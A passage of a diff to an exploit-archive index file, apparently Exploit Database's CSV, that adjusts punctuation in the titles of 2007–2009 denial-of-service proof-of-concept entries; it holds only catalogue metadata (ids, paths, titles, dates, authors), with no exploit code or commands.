Vulnerabilities",2007-05-04,shinnai,windows,dos,0 @@ -574,17 +574,17 @@ id,file,description,date,author,platform,type,port 3917,platforms/windows/dos/3917.html,"ID Automation Linear Barcode - ActiveX Denial of Service",2007-05-13,shinnai,windows,dos,0 3921,platforms/windows/dos/3921.html,"Clever Database Comparer ActiveX 2.2 - Remote Buffer Overflow (PoC)",2007-05-14,shinnai,windows,dos,0 3926,platforms/windows/dos/3926.py,"Microsoft Windows Vista - Forged ARP packet Network Stack Denial of Service",2007-05-15,"Kristian Hermansen",windows,dos,0 -3929,platforms/windows/dos/3929.txt,"BitsCast 0.13.0 - (invalid string) Remote Denial of Service",2007-05-15,gbr,windows,dos,0 -3930,platforms/windows/dos/3930.txt,"NewzCrawler 1.8 - (invalid string) Remote Denial of Service",2007-05-15,gbr,windows,dos,0 +3929,platforms/windows/dos/3929.txt,"BitsCast 0.13.0 - invalid string Remote Denial of Service",2007-05-15,gbr,windows,dos,0 +3930,platforms/windows/dos/3930.txt,"NewzCrawler 1.8 - invalid string Remote Denial of Service",2007-05-15,gbr,windows,dos,0 3937,platforms/windows/dos/3937.html,"PrecisionID Barcode ActiveX 1.9 - Remote Denial of Service",2007-05-16,shinnai,windows,dos,0 3939,platforms/windows/dos/3939.py,"CA BrightStor Backup 11.5.2.0 - 'caloggderd.exe' Denial of Service",2007-05-16,Shirkdog,windows,dos,0 3940,platforms/windows/dos/3940.py,"CA BrightStor Backup 11.5.2.0 - 'Mediasvr.exe' Denial of Service",2007-05-16,Shirkdog,windows,dos,0 3945,platforms/linux/dos/3945.rb,"MagicISO 5.4 (build239) - '.cue' Heap Overflow (PoC)",2007-05-17,n00b,linux,dos,0 -3965,platforms/windows/dos/3965.pl,"Microsoft IIS 6.0 - /AUX / '.aspx' Remote Denial of Service",2007-05-21,kingcope,windows,dos,0 +3965,platforms/windows/dos/3965.pl,"Microsoft IIS 6.0 - '/AUX / '.aspx' Remote Denial of Service",2007-05-21,kingcope,windows,dos,0 3969,platforms/windows/dos/3969.html,"LeadTools ISIS Control - 'ltisi14E.ocx 14.5.0.44' Remote Denial of Service",2007-05-22,shinnai,windows,dos,0 3973,platforms/windows/dos/3973.html,"Microsoft Office 2000 (OUACTRL.OCX 1.0.1.9) - Remote Denial of Service",2007-05-23,shinnai,windows,dos,0 -3976,platforms/windows/dos/3976.pl,"Microsoft Visual Basic 6.0 Project - (Company Name) Stack Overflow (PoC)",2007-05-23,UmZ,windows,dos,0 -3977,platforms/windows/dos/3977.pl,"Microsoft Visual Basic 6.0 Project - (Description) Stack Overflow (PoC)",2007-05-23,UmZ,windows,dos,0 +3976,platforms/windows/dos/3976.pl,"Microsoft Visual Basic 6.0 Project - Company Name Stack Overflow (PoC)",2007-05-23,UmZ,windows,dos,0 +3977,platforms/windows/dos/3977.pl,"Microsoft Visual Basic 6.0 Project - Description Stack Overflow (PoC)",2007-05-23,UmZ,windows,dos,0 3978,platforms/windows/dos/3978.pl,"UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (PoC)",2007-05-24,n00b,windows,dos,0 3979,platforms/windows/dos/3979.html,"LeadTools Raster Dialog File Object - ActiveX Remote Buffer Overflow (PoC)",2007-05-24,shinnai,windows,dos,0 3986,platforms/windows/dos/3986.html,"LeadTools Raster - Dialog File_D Object Remote Buffer Overflow",2007-05-25,shinnai,windows,dos,0 @@ -604,7 +604,7 @@ id,file,description,date,author,platform,type,port 4120,platforms/windows/dos/4120.html,"Sony Network Camera SNC-P5 1.0 - ActiveX viewer Heap Overflow (PoC)",2007-06-27,str0ke,windows,dos,0 4121,platforms/windows/dos/4121.txt,"Microsoft Excel 2000/2003 - Sheet Name (PoC)",2007-06-27,ZhenHan.Liu,windows,dos,0 4126,platforms/windows/dos/4126.c,"W3Filer 2.1.3 - Remote Stack Overflow (PoC)",2007-06-29,r0ut3r,windows,dos,0 -4137,platforms/windows/dos/4137.html,"HP Instant Support - (Driver Check) Remote Buffer Overflow (PoC)",2007-07-02,shinnai,windows,dos,0 +4137,platforms/windows/dos/4137.html,"HP Instant Support - Driver Check Remote Buffer Overflow (PoC)",2007-07-02,shinnai,windows,dos,0 4148,platforms/windows/dos/4148.html,"EnjoySAP ActiveX kweditcontrol.kwedit.1 - Remote Stack Overflow (PoC)",2007-07-05,"Mark Litchfield",windows,dos,0 4149,platforms/windows/dos/4149.html,"EnjoySAP ActiveX rfcguisink.rfcguisink.1 - Remote Heap Overflow (PoC)",2007-07-05,"Mark Litchfield",windows,dos,0 4168,platforms/windows/dos/4168.vbs,"Sun Java WebStart - JNLP Stack Buffer Overflow (PoC)",2007-07-10,ZhenHan.Liu,windows,dos,0 @@ -625,12 +625,12 @@ id,file,description,date,author,platform,type,port 4289,platforms/windows/dos/4289.php,"EFS Easy Chat Server 2.2 - Remote Denial of Service",2007-08-14,NetJackal,windows,dos,0 4293,platforms/win_x86/dos/4293.php,"PHP 5.2.0 (Windows x86) - 'PHP_win32sti' Local Buffer Overflow",2007-08-18,boecke,win_x86,dos,0 4294,platforms/windows/dos/4294.pl,"Mercury/32 Mail SMTPD - Remote Unauthenticated Stack Based Overrun (PoC)",2007-08-18,eliteboy,windows,dos,0 -4297,platforms/hardware/dos/4297.pl,"Cisco IP Phone 7940 - (3 SIP Messages) Remote Denial of Service",2007-08-21,MADYNES,hardware,dos,0 -4298,platforms/hardware/dos/4298.pl,"Cisco IP Phone 7940 - (10 SIP Messages) Remote Denial of Service",2007-08-21,MADYNES,hardware,dos,0 +4297,platforms/hardware/dos/4297.pl,"Cisco IP Phone 7940 - 3 SIP Messages Remote Denial of Service",2007-08-21,MADYNES,hardware,dos,0 +4298,platforms/hardware/dos/4298.pl,"Cisco IP Phone 7940 - 10 SIP Messages Remote Denial of Service",2007-08-21,MADYNES,hardware,dos,0 4304,platforms/windows/dos/4304.php,"PHP 5.2.3 - PHP_ntuser ntuser_getuserlist() Local Buffer Overflow (PoC)",2007-08-23,shinnai,windows,dos,0 4318,platforms/win_x86/dos/4318.php,"PHP 5.2.0 (Windows x86) - 'PHP_iisfunc.dll' Local Buffer Overflow",2007-08-27,boecke,win_x86,dos,0 4319,platforms/hardware/dos/4319.pl,"Thomson SpeedTouch ST 2030 (SIP Phone) - Remote Denial of Service",2007-08-27,MADYNES,hardware,dos,0 -4335,platforms/windows/dos/4335.txt,"Yahoo! Messenger 8.1.0.413 - (webcam) Remote Crash",2007-08-29,wushi,windows,dos,0 +4335,platforms/windows/dos/4335.txt,"Yahoo! Messenger 8.1.0.413 - 'webcam' Remote Crash",2007-08-29,wushi,windows,dos,0 4337,platforms/windows/dos/4337.c,"Microsoft Windows - 'gdi32.dll' Denial of Service (MS07-046)",2007-08-29,"Gil-Dong / Woo-Chi",windows,dos,0 4344,platforms/windows/dos/4344.php,"Hexamail Server 3.0.0.001 - 'pop3' Unauthenticated Remote Overflow (PoC)",2007-08-30,rgod,windows,dos,0 4347,platforms/linux/dos/4347.pl,"Wireshark < 0.99.5 - DNP3 Dissector Infinite Loop",2007-08-31,"Beyond Security",linux,dos,0 @@ -656,7 +656,7 @@ id,file,description,date,author,platform,type,port 4601,platforms/multiple/dos/4601.txt,"Ubuntu 6.06 DHCPd - Remote Denial of Service",2007-11-02,RoMaNSoFt,multiple,dos,0 4610,platforms/windows/dos/4610.html,"Viewpoint Media Player for IE 3.2 - Remote Stack Overflow (PoC)",2007-11-06,shinnai,windows,dos,0 4613,platforms/windows/dos/4613.html,"Adobe Shockwave - 'ShockwaveVersion()' Stack Overflow (PoC)",2007-11-08,Elazar,windows,dos,0 -4615,platforms/multiple/dos/4615.txt,"MySQL 5.0.45 - (Alter) Denial of Service",2007-11-09,"Kristian Hermansen",multiple,dos,0 +4615,platforms/multiple/dos/4615.txt,"MySQL 5.0.45 - 'Alter' Denial of Service",2007-11-09,"Kristian Hermansen",multiple,dos,0 4624,platforms/osx/dos/4624.c,"Apple Mac OSX 10.4.x Kernel - 'i386_set_ldt()' Integer Overflow (PoC)",2007-11-16,"RISE Security",osx,dos,0 4648,platforms/multiple/dos/4648.py,"Apple QuickTime 7.2/7.3 - RTSP Response Remote Overwrite (SEH)",2007-11-23,h07,multiple,dos,0 4682,platforms/windows/dos/4682.c,"Microsoft Windows Media Player - '.AIFF' Divide By Zero Exception Denial of Service (PoC)",2007-11-29,"Gil-Dong / Woo-Chi",windows,dos,0 @@ -666,7 +666,7 @@ id,file,description,date,author,platform,type,port 4690,platforms/osx/dos/4690.c,"Apple Mac OSX 10.5.0 (Leopard) - vpnd Remote Denial of Service (PoC)",2007-12-04,mu-b,osx,dos,0 4692,platforms/hardware/dos/4692.pl,"Cisco Phone 7940 - Remote Denial of Service",2007-12-05,MADYNES,hardware,dos,0 4716,platforms/windows/dos/4716.html,"Online Media Technologies 'AVSMJPEGFILE.DLL 1.1' - Remote Buffer Overflow (PoC)",2007-12-11,shinnai,windows,dos,0 -4717,platforms/windows/dos/4717.py,"Simple HTTPD 1.41 - (/aux) Remote Denial of Service",2007-12-11,shinnai,windows,dos,0 +4717,platforms/windows/dos/4717.py,"Simple HTTPD 1.41 - '/aux' Remote Denial of Service",2007-12-11,shinnai,windows,dos,0 4723,platforms/osx/dos/4723.c,"Apple Mac OSX xnu 1228.0 - super_blob Local kernel Denial of Service (PoC)",2007-12-12,mu-b,osx,dos,0 4732,platforms/linux/dos/4732.c,"Samba 3.0.27a - 'send_mailslot()' Remote Buffer Overflow",2007-12-14,x86,linux,dos,0 4742,platforms/windows/dos/4742.py,"WFTPD Explorer Pro 1.0 - Remote Heap Overflow (PoC)",2007-12-18,r4x,windows,dos,0 @@ -739,7 +739,7 @@ id,file,description,date,author,platform,type,port 5712,platforms/multiple/dos/5712.pl,"Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC)",2008-06-01,"Guido Landi",multiple,dos,0 5718,platforms/windows/dos/5718.pl,"Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)",2008-06-01,securfrog,windows,dos,0 5727,platforms/windows/dos/5727.pl,"Alt-N MDaemon 9.6.5 - Multiple Remote Buffer Overflows (PoC)",2008-06-02,securfrog,windows,dos,0 -5749,platforms/multiple/dos/5749.pl,"Asterisk 1.2.x - (SIP channel driver / in pedantic mode) Remote Crash",2008-06-05,"Armando Oliveira",multiple,dos,0 +5749,platforms/multiple/dos/5749.pl,"Asterisk 1.2.x - SIP channel driver / in pedantic mode Remote Crash",2008-06-05,"Armando Oliveira",multiple,dos,0 5814,platforms/linux/dos/5814.pl,"vsftpd 2.0.5 - 'CWD' Authenticated Remote Memory Consumption",2008-06-14,"Praveen Darshanam",linux,dos,0 5817,platforms/windows/dos/5817.pl,"Dana IRC 1.3 - Remote Buffer Overflow (PoC)",2008-06-14,t0pP8uZz,windows,dos,0 5843,platforms/windows/dos/5843.html,"P2P Foxy - Out of Memory Denial of Service",2008-06-17,Styxosaurus,windows,dos,0 @@ -755,7 +755,7 @@ id,file,description,date,author,platform,type,port 6083,platforms/windows/dos/6083.html,"Document Imaging SDK 10.95 - ActiveX Buffer Overflow (PoC)",2008-07-15,r0ut3r,windows,dos,0 6090,platforms/windows/dos/6090.html,"PPMate PPMedia Class - ActiveX Control Buffer Overflow (PoC)",2008-07-17,"Guido Landi",windows,dos,0 6101,platforms/multiple/dos/6101.py,"Oracle Internet Directory 10.1.4 - Remote Unauthenticated Denial of Service",2008-07-19,"Joxean Koret",multiple,dos,0 -6103,platforms/windows/dos/6103.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow (PoC)",2008-07-21,"Guido Landi",windows,dos,0 +6103,platforms/windows/dos/6103.pl,"IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow (PoC)",2008-07-21,"Guido Landi",windows,dos,0 6120,platforms/minix/dos/6120.txt,"Minix 3.1.2a - Local TTY Panic (Denial of Service)",2008-07-23,kokanin,minix,dos,0 6129,platforms/minix/dos/6129.txt,"Minix 3.1.2a - Remote TTY Panic (Denial of Service)",2008-07-25,kokanin,minix,dos,0 6174,platforms/multiple/dos/6174.txt,"F-PROT AntiVirus 6.2.1.4252 - Malformed Archive Infinite Loop Denial of Service",2008-07-31,kokanin,multiple,dos,0 @@ -765,7 +765,7 @@ id,file,description,date,author,platform,type,port 6216,platforms/windows/dos/6216.html,"Download Accelerator Plus DAP 8.6 - 'AniGIF.ocx' Buffer Overflow (PoC)",2008-08-10,"Guido Landi",windows,dos,0 6218,platforms/multiple/dos/6218.txt,"Sun xVM VirtualBox < 1.6.4 - Privilege Escalation (PoC)",2008-08-10,"Core Security",multiple,dos,0 6237,platforms/multiple/dos/6237.txt,"Ventrilo 3.0.2 - Null Pointer Remote Denial of Service",2008-08-13,"Luigi Auriemma",multiple,dos,0 -6239,platforms/multiple/dos/6239.txt,"Ruby 1.9 - (regex engine) Remote Socket Memory Leak Exploit",2008-08-13,"laurent gaffié",multiple,dos,0 +6239,platforms/multiple/dos/6239.txt,"Ruby 1.9 - regex engine Remote Socket Memory Leak Exploit",2008-08-13,"laurent gaffié",multiple,dos,0 6240,platforms/windows/dos/6240.py,"FlashGet 1.9 - 'FTP PWD Response' Remote Buffer Overflow (PoC)",2008-08-13,h07,windows,dos,0 6244,platforms/windows/dos/6244.js,"Microsoft Visual Studio - 'Msmask32.ocx' ActiveX Remote Buffer Overflow (PoC)",2008-08-14,Symantec,windows,dos,0 6251,platforms/windows/dos/6251.txt,"ESET Smart Security 3.0.667.0 - Privilege Escalation (PoC)",2008-08-16,g_,windows,dos,0 @@ -780,10 +780,10 @@ id,file,description,date,author,platform,type,port 6330,platforms/windows/dos/6330.txt,"Microsoft Windows - GDI (CreateDIBPatternBrushPt) Heap Overflow (PoC)",2008-08-29,Ac!dDrop,windows,dos,0 6345,platforms/windows/dos/6345.html,"VMware - COM API ActiveX Remote Buffer Overflow (PoC)",2008-09-01,shinnai,windows,dos,0 6353,platforms/windows/dos/6353.txt,"Google Chrome 0.2.149.27 - Denial of Service",2008-09-03,"Rishi Narang",windows,dos,0 -6365,platforms/windows/dos/6365.php,"Google Chrome 0.2.149.27 - (1583) Remote Silent Crash (PoC)",2008-09-04,WHK,windows,dos,0 +6365,platforms/windows/dos/6365.php,"Google Chrome 0.2.149.27 - '1583' Remote Silent Crash (PoC)",2008-09-04,WHK,windows,dos,0 6372,platforms/windows/dos/6372.html,"Google Chrome 0.2.149.27 - A HREF Denial of Service",2008-09-05,Shinnok,windows,dos,0 6386,platforms/windows/dos/6386.html,"Google Chrome 0.2.149.27 - Inspect Element Denial of Service",2008-09-05,Metacortex,windows,dos,0 -6391,platforms/windows/dos/6391.htm,"Flock Social Web Browser 1.2.5 - (loop) Remote Denial of Service",2008-09-06,LiquidWorm,windows,dos,0 +6391,platforms/windows/dos/6391.htm,"Flock Social Web Browser 1.2.5 - 'loop' Remote Denial of Service",2008-09-06,LiquidWorm,windows,dos,0 6394,platforms/hardware/dos/6394.pl,"Samsung DVR SHR2040 - HTTPD Remote Denial of Service Denial of Service (PoC)",2008-09-07,"Alex Hernandez",hardware,dos,0 6424,platforms/windows/dos/6424.html,"Adobe Acrobat 9 - ActiveX Remote Denial of Service",2008-09-11,"Jeremy Brown",windows,dos,0 6434,platforms/windows/dos/6434.html,"Maxthon Browser 2.1.4.443 - Unicode Remote Denial of Service (PoC)",2008-09-11,LiquidWorm,windows,dos,0 @@ -797,7 +797,7 @@ id,file,description,date,author,platform,type,port 6493,platforms/linux/dos/6493.pl,"fhttpd 0.4.2 - 'un64()' Remote Denial of Service",2008-09-19,"Jeremy Brown",linux,dos,0 6496,platforms/windows/dos/6496.c,"DESlock+ < 3.2.7 - Local Kernel Overflow (PoC)",2008-09-20,mu-b,windows,dos,0 6497,platforms/windows/dos/6497.c,"DESlock+ < 3.2.7 - Local Kernel Race Condition Denial of Service (PoC)",2008-09-20,mu-b,windows,dos,0 -6498,platforms/windows/dos/6498.c,"DESlock+ < 3.2.7 - (probe read) Local Kernel Denial of Service (PoC)",2008-09-20,mu-b,windows,dos,0 +6498,platforms/windows/dos/6498.c,"DESlock+ < 3.2.7 - 'probe read' Local Kernel Denial of Service (PoC)",2008-09-20,mu-b,windows,dos,0 6515,platforms/windows/dos/6515.c,"DESlock+ 3.2.7 - 'vdlptokn.sys' Local Denial of Service",2008-09-21,"NT Internals",windows,dos,0 6554,platforms/windows/dos/6554.html,"Google Chrome - Carriage Return Null Object Memory Exhaustion",2008-09-24,"Aditya K Sood",windows,dos,0 6560,platforms/windows/dos/6560.txt,"Microsoft Windows Wordpad - '.doc' File Local Denial of Service (PoC)",2008-09-25,securfrog,windows,dos,0 @@ -852,17 +852,17 @@ id,file,description,date,author,platform,type,port 7091,platforms/linux/dos/7091.c,"Linux Kernel < 2.4.36.9/2.6.27.5 - Unix Sockets Local Kernel Panic (Denial of Service)",2008-11-11,"Andrea Bittau",linux,dos,0 7099,platforms/windows/dos/7099.pl,"Castle Rock Computing SNMPc < 7.1.1 - 'Community' Remote Buffer Overflow (PoC)",2008-11-12,"Praveen Darshanam",windows,dos,0 7100,platforms/linux/dos/7100.pl,"Net-SNMP 5.1.4/5.2.4/5.4.1 Perl Module - Buffer Overflow (PoC)",2008-11-12,"Praveen Darshanam",linux,dos,0 -7109,platforms/windows/dos/7109.txt,"Pi3Web 2.0.3 - (ISAPI) Remote Denial of Service",2008-11-13,"Hamid Ebadi",windows,dos,0 +7109,platforms/windows/dos/7109.txt,"Pi3Web 2.0.3 - 'ISAPI' Remote Denial of Service",2008-11-13,"Hamid Ebadi",windows,dos,0 7126,platforms/windows/dos/7126.html,"VeryPDF PDFView - OCX ActiveX OpenPDF Heap Overflow (PoC)",2008-11-15,r0ut3r,windows,dos,0 7150,platforms/linux/dos/7150.html,"CUPS 1.3.7 - Cross-Site Request Forgery (add rss subscription) Remote Crash",2008-11-18,"Adrian _pagvac_ Pastor",linux,dos,0 7178,platforms/windows/dos/7178.txt,"BitDefender - Module pdf.xmd Infinite Loop Denial of Service (PoC)",2008-11-20,ProTeuS,windows,dos,0 7207,platforms/windows/dos/7207.pl,"Nero ShowTime 5.0.15.0 - '.m3u' Playlist File Remote Buffer Overflow (PoC)",2008-11-24,LiquidWorm,windows,dos,0 -7209,platforms/windows/dos/7209.pl,"W3C Amaya 10.1 Web Browser - (URL Bar) Remote Stack Overflow (PoC)",2008-11-24,r0ut3r,windows,dos,0 +7209,platforms/windows/dos/7209.pl,"W3C Amaya 10.1 Web Browser - URL Bar Remote Stack Overflow (PoC)",2008-11-24,r0ut3r,windows,dos,0 7213,platforms/windows/dos/7213.pl,"W3C Amaya 10.1 Web Browser - 'id' Remote Stack Overflow (PoC)",2008-11-24,r0ut3r,windows,dos,0 7219,platforms/windows/dos/7219.pl,"Total Video Player - 'vcen.dll' Remote Off-by-One Crash",2008-11-24,Cnaph,windows,dos,0 7220,platforms/hardware/dos/7220.txt,"Siemens C450IP/C475IP - Remote Denial of Service",2008-11-24,"sky & Any",hardware,dos,0 7226,platforms/windows/dos/7226.html,"Google Chrome - MetaCharacter URI Obfuscation",2008-11-25,"Aditya K Sood",windows,dos,0 -7249,platforms/windows/dos/7249.php,"i.Scribe SMTP Client 2.00b - (wscanf) Remote Format String (PoC)",2008-11-27,"Alfons Luja",windows,dos,0 +7249,platforms/windows/dos/7249.php,"i.Scribe SMTP Client 2.00b - wscanf Remote Format String (PoC)",2008-11-27,"Alfons Luja",windows,dos,0 7262,platforms/windows/dos/7262.pl,"Microsoft Office - Communicator (SIP) Remote Denial of Service",2008-11-28,"Praveen Darshanam",windows,dos,0 7296,platforms/windows/dos/7296.txt,"Apple iTunes 8.0.2.20/QuickTime 7.5.5 - '.mov' Multiple Off By Overflows (PoC)",2008-11-30,"laurent gaffié",windows,dos,0 7297,platforms/windows/dos/7297.py,"Cain & Abel 4.9.23 - '.rdp' Buffer Overflow (PoC)",2008-11-30,Encrypt3d.M!nd,windows,dos,0 @@ -878,10 +878,10 @@ id,file,description,date,author,platform,type,port 7454,platforms/linux/dos/7454.c,"Linux Kernel 2.6.27.7-generic/2.6.18/2.6.24-1 - Local Denial of Service",2008-12-14,Adurit-T,linux,dos,0 7460,platforms/windows/dos/7460.html,"EvansFTP - 'EvansFTP.ocx' Remote Buffer Overflow (PoC)",2008-12-14,Bl@ckbe@rD,windows,dos,0 7467,platforms/multiple/dos/7467.txt,"Amaya Web Browser 10.0.1/10.1-pre5 - HTML Tag Buffer Overflow (PoC)",2008-12-15,webDEViL,multiple,dos,0 -7520,platforms/multiple/dos/7520.c,"Avahi < 0.6.24 - (mDNS Daemon) Remote Denial of Service",2008-12-19,"Jon Oberheide",multiple,dos,0 +7520,platforms/multiple/dos/7520.c,"Avahi < 0.6.24 - mDNS Daemon Remote Denial of Service",2008-12-19,"Jon Oberheide",multiple,dos,0 7535,platforms/hardware/dos/7535.php,"Linksys WAG54G v2 Wireless ADSL Router - httpd Denial of Service",2008-12-21,r0ut3r,hardware,dos,0 7554,platforms/windows/dos/7554.pl,"Mozilla Firefox 3.0.5 - location.hash Remote Crash",2008-12-23,"Jeremy Brown",windows,dos,0 -7555,platforms/multiple/dos/7555.py,"Psi Jabber Client (Windows / Linux) - (8010/tcp) Remote Denial of Service",2008-12-23,Sha0,multiple,dos,0 +7555,platforms/multiple/dos/7555.py,"Psi Jabber Client (Windows / Linux) - Remote Denial of Service",2008-12-23,Sha0,multiple,dos,0 7556,platforms/windows/dos/7556.php,"PGP Desktop 9.0.6 - 'PGPwded.sys' Local Denial of Service",2008-12-23,Evilcry,windows,dos,0 7564,platforms/multiple/dos/7564.pl,"Getleft 1.2 - Remote Buffer Overflow (PoC)",2008-12-23,Koshi,multiple,dos,0 7571,platforms/windows/dos/7571.txt,"BulletProof FTP Client 2.63 - Local Heap Overflow (PoC)",2008-12-24,His0k4,windows,dos,0 @@ -898,7 +898,7 @@ id,file,description,date,author,platform,type,port 7652,platforms/windows/dos/7652.pl,"Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (PoC)",2009-01-03,Encrypt3d.M!nd,windows,dos,0 7673,platforms/multiple/dos/7673.html,"Apple Safari - 'ARGUMENTS' Array Integer Overflow (PoC) (Heap Spray)",2009-01-05,Skylined,multiple,dos,0 7685,platforms/multiple/dos/7685.pl,"SeaMonkey 1.1.14 - Denial of Service",2009-01-06,StAkeR,multiple,dos,0 -7693,platforms/windows/dos/7693.pl,"Perception LiteServe 2.0.1 - (user) Remote Buffer Overflow (PoC)",2009-01-07,Houssamix,windows,dos,0 +7693,platforms/windows/dos/7693.pl,"Perception LiteServe 2.0.1 - 'user' Remote Buffer Overflow (PoC)",2009-01-07,Houssamix,windows,dos,0 7694,platforms/windows/dos/7694.py,"Audacity 1.6.2 - '.aup' Remote Off-by-One Crash",2009-01-07,Stack,windows,dos,0 7696,platforms/windows/dos/7696.pl,"Winamp GEN_MSN Plugin - Heap Buffer Overflow (PoC)",2009-01-07,SkD,windows,dos,0 7708,platforms/windows/dos/7708.pl,"MP3 TrackMaker 1.5 - '.mp3' Local Heap Overflow (PoC)",2009-01-09,Houssamix,windows,dos,0 @@ -914,11 +914,11 @@ id,file,description,date,author,platform,type,port 7776,platforms/hardware/dos/7776.c,"Cisco - VLAN Trunking Protocol Denial of Service",2009-01-14,showrun,hardware,dos,0 7785,platforms/multiple/dos/7785.py,"Oracle TimesTen - Remote Format String (PoC)",2009-01-14,"Joxean Koret",multiple,dos,0 7790,platforms/windows/dos/7790.txt,"netsurf Web browser 1.2 - Multiple Vulnerabilities",2009-01-14,"Jeremy Brown",windows,dos,0 -7799,platforms/windows/dos/7799.pl,"Novell Netware 6.5 - (ICEbrowser) Remote System Denial of Service",2009-01-16,"Jeremy Brown",windows,dos,0 +7799,platforms/windows/dos/7799.pl,"Novell Netware 6.5 - 'ICEbrowser' Remote System Denial of Service",2009-01-16,"Jeremy Brown",windows,dos,0 7812,platforms/multiple/dos/7812.pl,"MPlayer 1.0rc2 - TwinVQ Stack Buffer Overflow (PoC)",2009-01-16,sCORPINo,multiple,dos,0 -7822,platforms/multiple/dos/7822.c,"D-Bus Daemon < 1.2.4 - (libdbus) Denial of Service",2009-01-19,"Jon Oberheide",multiple,dos,0 +7822,platforms/multiple/dos/7822.c,"D-Bus Daemon < 1.2.4 - 'libdbus' Denial of Service",2009-01-19,"Jon Oberheide",multiple,dos,0 7823,platforms/qnx/dos/7823.txt,"QNX 6.4.0 - bitflipped ELF Binary 'id' Kernel Panic (Denial of Service)",2009-01-19,kokanin,qnx,dos,0 -7852,platforms/windows/dos/7852.pl,"FTPShell Server 4.3 - (licence key) Remote Buffer Overflow (PoC)",2009-01-22,LiquidWorm,windows,dos,0 +7852,platforms/windows/dos/7852.pl,"FTPShell Server 4.3 - Licence Key Remote Buffer Overflow (PoC)",2009-01-22,LiquidWorm,windows,dos,0 7854,platforms/windows/dos/7854.pl,"MediaMonkey 3.0.6 - '.m3u' Local Buffer Overflow (PoC)",2009-01-25,AlpHaNiX,windows,dos,0 7857,platforms/windows/dos/7857.pl,"Merak Media Player 3.2 - '.m3u' File Local Buffer Overflow (PoC)",2009-01-25,Houssamix,windows,dos,0 7865,platforms/solaris/dos/7865.c,"SunOS Release 5.11 snv_101b - Remote IPv6 Crash",2009-01-26,kingcope,solaris,dos,0 @@ -947,7 +947,7 @@ id,file,description,date,author,platform,type,port 8077,platforms/windows/dos/8077.html,"Microsoft Internet Explorer 7 - Memory Corruption (PoC) (MS09-002)",2009-02-18,anonymous,windows,dos,0 8084,platforms/windows/dos/8084.pl,"Got All Media 7.0.0.3 - Remote Denial of Service",2009-02-20,LiquidWorm,windows,dos,0 8090,platforms/windows/dos/8090.txt,"Multiple PDF Readers - JBIG2 Local Buffer Overflow (PoC)",2009-02-23,webDEViL,windows,dos,0 -8091,platforms/multiple/dos/8091.html,"Mozilla Firefox 3.0.6 - (BODY onload) Remote Crash",2009-02-23,Skylined,multiple,dos,0 +8091,platforms/multiple/dos/8091.html,"Mozilla Firefox 3.0.6 - BODY onload Remote Crash",2009-02-23,Skylined,multiple,dos,0 8099,platforms/windows/dos/8099.pl,"Adobe Acrobat Reader - JBIG2 Local Buffer Overflow (PoC) (2)",2009-02-23,"Guido Landi",windows,dos,0 8102,platforms/windows/dos/8102.txt,"Counter Strike Source ManiAdminPlugin 1.x - Remote Buffer Overflow (PoC)",2009-02-24,M4rt1n,windows,dos,0 8106,platforms/hardware/dos/8106.txt,"NETGEAR WGR614v9 Wireless Router - Denial of Service",2009-02-25,staticrez,hardware,dos,0 @@ -961,7 +961,7 @@ id,file,description,date,author,platform,type,port 8187,platforms/hardware/dos/8187.sh,"Addonics NAS Adapter - Authenticated Denial of Service",2009-03-09,h00die,hardware,dos,0 8190,platforms/windows/dos/8190.txt,"IBM Director 5.20.3su2 CIM Server - Remote Denial of Service",2009-03-10,"Bernhard Mueller",windows,dos,0 8205,platforms/linux/dos/8205.pl,"JDKChat 1.5 - Remote Integer Overflow (PoC)",2009-03-12,n3tpr0b3,linux,dos,0 -8212,platforms/windows/dos/8212.pl,"RhinoSoft Serv-U FTP Server 7.4.0.1 - (SMNT) Authenticated Denial of Service",2009-03-16,"Jonathan Salwan",windows,dos,0 +8212,platforms/windows/dos/8212.pl,"RhinoSoft Serv-U FTP Server 7.4.0.1 - 'SMNT' Authenticated Denial of Service",2009-03-16,"Jonathan Salwan",windows,dos,0 8213,platforms/windows/dos/8213.pl,"VideoLAN VLC Media Player 0.9.8a - Web UI (input) Remote Denial of Service",2009-03-16,TheLeader,windows,dos,0 8219,platforms/multiple/dos/8219.html,"Mozilla Firefox 3.0.7 - OnbeforeUnLoad DesignMode Dereference Crash",2009-03-16,Skylined,multiple,dos,0 8224,platforms/windows/dos/8224.pl,"WinAsm Studio 5.1.5.0 - Local Heap Overflow (PoC)",2009-03-16,Stack,windows,dos,0 @@ -972,21 +972,21 @@ id,file,description,date,author,platform,type,port 8259,platforms/freebsd/dos/8259.c,"FreeBSD 7.x - Dumping Environment Local Kernel Panic (Denial of Service)",2009-03-23,kokanin,freebsd,dos,0 8260,platforms/hardware/dos/8260.txt,"Gigaset SE461 WiMAX Router - Remote Denial of Service",2009-03-23,Benkei,hardware,dos,0 8262,platforms/osx/dos/8262.c,"Apple Mac OSX xnu 1228.3.13 - 'zip-notify' Remote Kernel Overflow (PoC)",2009-03-23,mu-b,osx,dos,0 -8263,platforms/osx/dos/8263.c,"Apple Mac OSX xnu 1228.3.13 - (macfsstat) Local Kernel Memory Leak/Denial of Service",2009-03-23,mu-b,osx,dos,0 +8263,platforms/osx/dos/8263.c,"Apple Mac OSX xnu 1228.3.13 - 'macfsstat' Local Kernel Memory Leak/Denial of Service",2009-03-23,mu-b,osx,dos,0 8264,platforms/osx/dos/8264.c,"Apple Mac OSX xnu 1228.3.13 - 'Profil' Kernel Memory Leak/Denial of Service (PoC)",2009-03-23,mu-b,osx,dos,0 8265,platforms/osx/dos/8265.c,"Apple Mac OSX xnu 1228.x - 'vfssysctl' Local Kernel Denial of Service (PoC)",2009-03-23,mu-b,osx,dos,0 8281,platforms/windows/dos/8281.txt,"Microsoft GdiPlus - EMF GpFont.SetData Integer Overflow (PoC)",2009-03-24,"Black Security",windows,dos,0 8285,platforms/multiple/dos/8285.txt,"Mozilla Firefox XSL - Parsing Remote Memory Corruption (PoC) (1)",2009-03-25,"Guido Landi",multiple,dos,0 8294,platforms/windows/dos/8294.c,"XM Easy Personal FTP Server 5.7.0 - 'NLST' Denial of Service",2009-03-27,"Jonathan Salwan",windows,dos,0 8300,platforms/windows/dos/8300.py,"PowerCHM 5.7 - '.hhp' Stack Overflow (PoC)",2009-03-27,Encrypt3d.M!nd,windows,dos,0 -8306,platforms/windows/dos/8306.txt,"Mozilla Firefox 